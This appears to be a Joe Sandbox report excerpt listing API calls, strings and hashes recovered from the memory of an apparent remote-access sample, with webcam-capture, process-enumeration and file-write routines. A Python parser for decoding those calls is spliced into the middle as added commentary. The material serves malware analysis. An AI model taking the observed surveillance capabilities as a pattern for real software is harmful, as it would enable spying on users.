                                                                                                                                                    • Instruction Fuzzy Hash: A2F04434A1521CFBCB11AF54DC48BADBFB9EF04256F01459DFC46A2140DF309A40CAD0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,156F4EF8,15684E7A,00000001,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000), ref: 15685120
                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000), ref: 1568512C
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000), ref: 15685137
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000), ref: 15685140
                                                                                                                                                      • Part of subcall function 1569B4EF: GetLocalTime.KERNEL32(00000000), ref: 1569B509
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                    • String ID: KeepAlive | Disabled
                                                                                                                                                    • API String ID: 2993684571-305739064
                                                                                                                                                    • Opcode ID: 179a41b574580e1949ebbc03f89b2ca09746c94a05c5e8383f27e846a106bd91
                                                                                                                                                    • Instruction ID: 28d615dd576cd2d427baeb431e49f6a6256f83e16e413ef8908820166bd443b7
                                                                                                                                                    • Opcode Fuzzy Hash: 179a41b574580e1949ebbc03f89b2ca09746c94a05c5e8383f27e846a106bd91
                                                                                                                                                    • Instruction Fuzzy Hash: 6CF0B475925324BFEB217B748D4996E7F9AAB12220F00091DFCC381654DE216850CBE2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,1569CDED), ref: 1569CD62
                                                                                                                                                    • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,1569CDED), ref: 1569CD6F
                                                                                                                                                    • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,1569CDED), ref: 1569CD7C
                                                                                                                                                    • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,1569CDED), ref: 1569CD8F
                                                                                                                                                    Strings
                                                                                                                                                    • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 1569CD82
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                                                    • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                                                    • API String ID: 3024135584-2418719853
                                                                                                                                                    • Opcode ID: d588625469c855aa5a287c000b59e21d9afcad2dcc50ee8944502a8796190bf8
                                                                                                                                                    • Instruction ID: 1a2832670c9b3367a4eafa373dbb4c5fcb90f457daec9222e59cce133fd47c2b
                                                                                                                                                    • Opcode Fuzzy Hash: d588625469c855aa5a287c000b59e21d9afcad2dcc50ee8944502a8796190bf8
                                                                                                                                                    • Instruction Fuzzy Hash: ACE04F7291032DABE31067B59C8DDEB7B6DE785632B100A59FE6281182DF305450C6F1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b045f9a906c9f980da8bd7fcc30f182821ea88feedf8ee749aec0627605119ad
                                                                                                                                                    • Instruction ID: d58403ac1808f487142db62821f3df818ecea562a41b3c72337ca07b1ec97ea7
                                                                                                                                                    • Opcode Fuzzy Hash: b045f9a906c9f980da8bd7fcc30f182821ea88feedf8ee749aec0627605119ad
                                                                                                                                                    • Instruction Fuzzy Hash: E671E9B5E04257DBCB11CF94C884AAFBB79FF45360F9542AAE82267680DB709941C7E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNEL32(00000000,?), ref: 156844C4
                                                                                                                                                      • Part of subcall function 15684607: __EH_prolog.LIBCMT ref: 1568460C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prologSleep
                                                                                                                                                    • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                                                                                                    • API String ID: 3469354165-3547787478
                                                                                                                                                    • Opcode ID: a24d2170b5b2df865f5efb982dfbdb5c74f00c0846c493dac091baa9dbe2bc56
                                                                                                                                                    • Instruction ID: c1c927318a2e3c76bb00d2db6c822d2a991f510cb673be8132e911583a2aaee2
                                                                                                                                                    • Opcode Fuzzy Hash: a24d2170b5b2df865f5efb982dfbdb5c74f00c0846c493dac091baa9dbe2bc56
                                                                                                                                                    • Instruction Fuzzy Hash: 2D510879F0A3149BCB14EB34CC64A6E3B9AAF85654F40051DE80657BD0EF30B909C7EA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 156C6137: HeapAlloc.KERNEL32(00000000,156B52BC,?,?,156B8847,?,?,00000000,156F6B50,?,1568DE62,156B52BC,?,?,?,?), ref: 156C6169
                                                                                                                                                    • _free.LIBCMT ref: 156C4E06
                                                                                                                                                    • _free.LIBCMT ref: 156C4E1D
                                                                                                                                                    • _free.LIBCMT ref: 156C4E3C
                                                                                                                                                    • _free.LIBCMT ref: 156C4E57
                                                                                                                                                    • _free.LIBCMT ref: 156C4E6E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$AllocHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1835388192-0
                                                                                                                                                    • Opcode ID: 082ce42ebac7409b0ba13b001e32131762cd8fa2b8a7f6ef0563b5db0503a7c3
                                                                                                                                                    • Instruction ID: 4a252b80cb3ac461a6f3a05a86a8ef80ccb3f03460619e55aed8575ebd2dcc67
                                                                                                                                                    • Opcode Fuzzy Hash: 082ce42ebac7409b0ba13b001e32131762cd8fa2b8a7f6ef0563b5db0503a7c3
                                                                                                                                                    • Instruction Fuzzy Hash: B151BF71A01305AFD711DF29CC80E6AB7F5FF49726B0146A9E819DB650E731BA01CBD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,156DF234), ref: 156C93CF
• WideCharToMultiByte.KERNEL32(00000000,00000000,156F2764,000000FF,00000000,0000003F,00000000,?,?), ref: 156C9447
• WideCharToMultiByte.KERNEL32(00000000,00000000,156F27B8,000000FF,?,0000003F,00000000,?), ref: 156C9474
• _free.LIBCMT ref: 156C93BD
  • Part of subcall function 156C6782: HeapFree.KERNEL32(00000000,00000000,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?), ref: 156C6798
  • Part of subcall function 156C6782: GetLastError.KERNEL32(?,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?,?), ref: 156C67AA
• _free.LIBCMT ref: 156C9589
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 1286116820-0
• Opcode ID: 0816486464d559584d8887b80d4450c7ad8f3c47f499a6c5eaa1d5dc789ca380
• Instruction ID: f8446af9ef7d52fdf68a03b3ad0e39ef800a3698a976ae7fb2dd018b005ac1ff
• Opcode Fuzzy Hash: 0816486464d559584d8887b80d4450c7ad8f3c47f499a6c5eaa1d5dc789ca380
• Instruction Fuzzy Hash: EC51B475D04219ABCB10DF69CC909AEB7BCFF45220B1146EBE455D7680EB30BA41CBD4
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 1569BFB7: GetCurrentProcess.KERNEL32(?,?,?,1568DAAA,WinDir,00000000,00000000), ref: 1569BFC8
  • Part of subcall function 1569BFB7: IsWow64Process.KERNEL32(00000000,?,?,1568DAAA,WinDir,00000000,00000000), ref: 1569BFCF
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1568F91B
• Process32FirstW.KERNEL32(00000000,?), ref: 1568F93F
• Process32NextW.KERNEL32(00000000,0000022C), ref: 1568F94E
• CloseHandle.KERNEL32(00000000), ref: 1568FB05
  • Part of subcall function 1569BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,1568F5F9,00000000,?,?,156F5338), ref: 1569BFFA
  • Part of subcall function 1569BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,156F5338), ref: 1569C005
  • Part of subcall function 1569C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 1569C1F5
  • Part of subcall function 1569C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 1569C208
• Process32NextW.KERNEL32(00000000,0000022C), ref: 1568FAF6
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
• String ID:
• API String ID: 2180151492-0
• Opcode ID: 4b6c716ebd4f3667f6d123cd56a005170f3a088cb8889b19b4d554769ec492a4
• Instruction ID: a12b75412d74267ea4ce094884ab4d87c05c0d2e541d902b3cad97280502ab8d
• Opcode Fuzzy Hash: 4b6c716ebd4f3667f6d123cd56a005170f3a088cb8889b19b4d554769ec492a4
• Instruction Fuzzy Hash: 3C41273520A3459BC329DB21DC50AFFB3E9AFD4310F50491DE58A86294EF347A09C7DA
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: f0e5c4646ba0187dc6be7e88fe9843c121944b28910dc6fc903b50cac1f6a8b3
• Instruction ID: 42b91aa6fa72ccb41ca7de78dd098dafb844a7032f3098f4daf1755a528ff150
• Opcode Fuzzy Hash: f0e5c4646ba0187dc6be7e88fe9843c121944b28910dc6fc903b50cac1f6a8b3
• Instruction Fuzzy Hash: F2419E36F01214AFCB14CF78C880A5EB7B6FF89714B1545AAE915EB341DA71BA01CBC0
Uniqueness
Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,156BF8C8,?,00000000,?,00000001,?,?,00000001,156BF8C8,?), ref: 156D1179
• __alloca_probe_16.LIBCMT ref: 156D11B1
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 156D1202
• GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,156BAE84,?), ref: 156D1214
• __freea.LIBCMT ref: 156D121D
  • Part of subcall function 156C6137: HeapAlloc.KERNEL32(00000000,156B52BC,?,?,156B8847,?,?,00000000,156F6B50,?,1568DE62,156B52BC,?,?,?,?), ref: 156C6169
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
• String ID:
• API String ID: 1857427562-0
• Opcode ID: b18e63aa1545c00b4c195d31234353da832579e42d56dea88a2519ebb966b9f5
• Instruction ID: 9d9ecd893b15f59629528d0f8ea7f84545f996e2cbabe19fdbe8eee814a38f1a
• Opcode Fuzzy Hash: b18e63aa1545c00b4c195d31234353da832579e42d56dea88a2519ebb966b9f5
• Instruction Fuzzy Hash: 1E31E375A0121AEBDF25CFA4CC80DAEBBA6EF40610F010568EC45D7690EB76E991CBD0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32 ref: 156CF363
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 156CF386
  • Part of subcall function 156C6137: HeapAlloc.KERNEL32(00000000,156B52BC,?,?,156B8847,?,?,00000000,156F6B50,?,1568DE62,156B52BC,?,?,?,?), ref: 156C6169
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 156CF3AC
• _free.LIBCMT ref: 156CF3BF
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 156CF3CE
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
• String ID:
• API String ID: 2278895681-0
• Opcode ID: c34ff9d6e2f8fb878fb054f2854a0a0db1394392342194365842c2bc3d6ae370
• Instruction ID: 9ac4136cb02c49d169d938218ee0e6d04ab75fb61543580ba075d26c4c7f23f8
• Opcode Fuzzy Hash: c34ff9d6e2f8fb878fb054f2854a0a0db1394392342194365842c2bc3d6ae370
• Instruction Fuzzy Hash: B701D4736066297F672115BA5C8CCBFAA6DEAC6DB131106AEFC69C2640DF609D01C1F4
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,1569C510,00000000,00000000,00000000), ref: 1569C430
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,1569C510,00000000,00000000), ref: 1569C44D
• CloseHandle.KERNEL32(00000000,?,00000004,00000000,1569C510,00000000,00000000), ref: 1569C459
• WriteFile.KERNEL32(00000000,00000000,00000000,15686F85,00000000,?,00000004,00000000,1569C510,00000000,00000000), ref: 1569C46A
• CloseHandle.KERNEL32(00000000,?,00000004,00000000,1569C510,00000000,00000000), ref: 1569C477
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: File$CloseHandle$CreatePointerWrite
• String ID:
• API String ID: 1852769593-0
• Opcode ID: b37a02e72ba259ac8fade0600523c336ef6d40e2465b87c9ec33ba7d468b1851
• Instruction ID: 33e83a6c2f3d3e5559d48e0240a50aa4839f6401f4a41ec1b7ce405c3d582c0b
• Opcode Fuzzy Hash: b37a02e72ba259ac8fade0600523c336ef6d40e2465b87c9ec33ba7d468b1851
• Instruction Fuzzy Hash: 00118EB1314225BFF7088E29DC89EBB739EFB46A74F004B29F991C21C5CA219C05C6A1
Uniqueness
Uniqueness Score: -1.00%
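
The API lists above print every argument as a bare hex stack slot, so the access masks and dispositions that decide whether a routine is harmless or not have to be decoded by hand. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses lines in this listing's format and decodes the constants for the process-enumeration routine (ref 1568F91B and its OpenProcess subcalls) and the file-write routine (ref 1569C430). The sample lines are copied from those two lists; the parser, the flag tables (standard Windows SDK values) and the per-API decoder map are the example's own. Two caveats the code has to handle: a "?" is a stack slot the sandbox could not recover, and each list shows more values than the API's prototype has parameters (CreateFileW takes 7, the line shows 16), so only positions inside the documented prototype are decoded.

```python
# Parse the "APIs" lines of a Joe Sandbox function listing and decode the Win32
# constants that matter for triage. Example code, not part of the report.
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Union

Arg = Union[int, str, None]

# Lines copied from the "APIs" lists of the process-enumeration routine (1568F91B..)
# and the file-write routine (1569C430..) in this report.
REPORT_LINES = """\
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1568F91B
• Process32FirstW.KERNEL32(00000000,?), ref: 1568F93F
• Process32NextW.KERNEL32(00000000,0000022C), ref: 1568F94E
  • Part of subcall function 1569BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,1568F5F9,00000000,?,?,156F5338), ref: 1569BFFA
  • Part of subcall function 1569C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 1569C1F5
• CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,1569C510,00000000,00000000,00000000), ref: 1569C430
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,1569C510,00000000,00000000), ref: 1569C44D
• WriteFile.KERNEL32(00000000,00000000,00000000,15686F85,00000000,?,00000004,00000000,1569C510,00000000,00000000), ref: 1569C46A
• _free.LIBCMT ref: 156CF3BF
"""

# One line: optional "Part of subcall function X:" prefix, Name.MODULE, optional (args), ref: ADDR
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][\w:~@]*)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]             # int for a recovered dword, None for '?', str for a recovered string
    ref: int                    # address of the call site in the memory dump
    subcall_of: Optional[int]   # callee address when the line is "Part of subcall function"

def _parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None             # stack slot the sandbox could not recover
    return int(tok, 16) if HEX8.match(tok) else tok

def parse_api_lines(text: str) -> List[ApiCall]:
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue            # headings such as "APIs" or "Memory Dump Source"
        raw = m.group("args")
        calls.append(ApiCall(
            api=m.group("api"), module=m.group("mod"),
            args=[_parse_arg(t) for t in raw.split(",")] if raw else [],
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None))
    return calls

# Documented Win32 constants (Windows SDK header values).
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA", 0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
FILE_ATTRIBUTES = {0x02: "FILE_ATTRIBUTE_HIDDEN", 0x04: "FILE_ATTRIBUTE_SYSTEM", 0x80: "FILE_ATTRIBUTE_NORMAL"}
TH32CS = {0x1: "TH32CS_SNAPHEAPLIST", 0x2: "TH32CS_SNAPPROCESS", 0x4: "TH32CS_SNAPTHREAD", 0x8: "TH32CS_SNAPMODULE"}
CREATION_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
MOVE_METHOD = {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"}

# api -> {argument index: (parameter name, table, is_bitmask)}. Only indices inside the
# documented prototype are decoded: the report prints more stack slots than the API takes.
DECODERS = {
    "CreateToolhelp32Snapshot": {0: ("dwFlags", TH32CS, True)},
    "OpenProcess": {0: ("dwDesiredAccess", PROCESS_ACCESS, True)},
    "CreateFileW": {1: ("dwDesiredAccess", GENERIC_ACCESS, True),
                    4: ("dwCreationDisposition", CREATION_DISPOSITION, False),
                    5: ("dwFlagsAndAttributes", FILE_ATTRIBUTES, True)},
    "SetFilePointer": {3: ("dwMoveMethod", MOVE_METHOD, False)},
}

def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Split a bitmask into known flag names; bits not in the table are kept as hex."""
    if value == 0:
        return ["0"]
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    return names + ([f"0x{rest:X}"] if rest else [])

def describe(call: ApiCall) -> str:
    """One triage line per call: call-site address, API, decoded security-relevant arguments."""
    parts = [f"{call.ref:08X} {call.api}"]
    for idx, (label, table, bitmask) in DECODERS.get(call.api, {}).items():
        v = call.args[idx] if idx < len(call.args) else None
        if not isinstance(v, int):
            parts.append(f"{label}=?")
        elif bitmask:
            parts.append(f"{label}=" + "|".join(decode_flags(v, table)))
        else:
            parts.append(f"{label}=" + table.get(v, f"0x{v:X}"))
    if call.subcall_of is not None:
        parts.append(f"(via subcall {call.subcall_of:08X})")
    return " ".join(parts)

if __name__ == "__main__":
    for c in parse_api_lines(REPORT_LINES):
        print(describe(c))
```

Run against the lines copied above, the decoder shows that both OpenProcess calls in the enumeration routine request only 0x400 (PROCESS_QUERY_INFORMATION) or 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION), which is exactly what the IsWow64Process subcalls listed beside them need and grants no VM read or write rights, and that the file routine opens its target GENERIC_WRITE with CREATE_ALWAYS, then seeks with FILE_END before WriteFile, an append pattern. Extending the map to other APIs is a matter of adding an entry to DECODERS with the argument index taken from the documented prototype.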

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 15691170
• int.LIBCPMT ref: 15691183
  • Part of subcall function 1568E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 1568E0D2
  • Part of subcall function 1568E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 1568E0EC
• std::_Facet_Register.LIBCPMT ref: 156911C3
• std::_Lockit::~_Lockit.LIBCPMT ref: 156911CC
• __CxxThrowException@8.LIBVCRUNTIME ref: 156911EA
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
• String ID:
• API String ID: 2536120697-0
• Opcode ID: e70386855990880781943a7ecc3904ecf2baa4d841b208333f956789c70be781
• Instruction ID: 858c58160ca15c4920d060efe342243bdecfb19209e24d8665733434ede2116d
• Opcode Fuzzy Hash: e70386855990880781943a7ecc3904ecf2baa4d841b208333f956789c70be781
• Instruction Fuzzy Hash: 0A11C67AB01218AFCB14EFA4EC548DDBB79AF51260B20055EE805A7290EF70BE40C7D4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,156BBC87,00000000,?,?,156BBD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 156C829E
                                                                                                                                                    • _free.LIBCMT ref: 156C82D3
                                                                                                                                                    • _free.LIBCMT ref: 156C82FA
                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 156C8307
                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 156C8310
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                    • Opcode ID: 744accdd9eb699fad8fddecee443e069ebbe41d163cba56c132e5b5ed36f6f74
                                                                                                                                                    • Instruction ID: d4668d2bb1910a147b4b449f6bb05a77e2d98bf272eac4c9ff929800c4c047eb
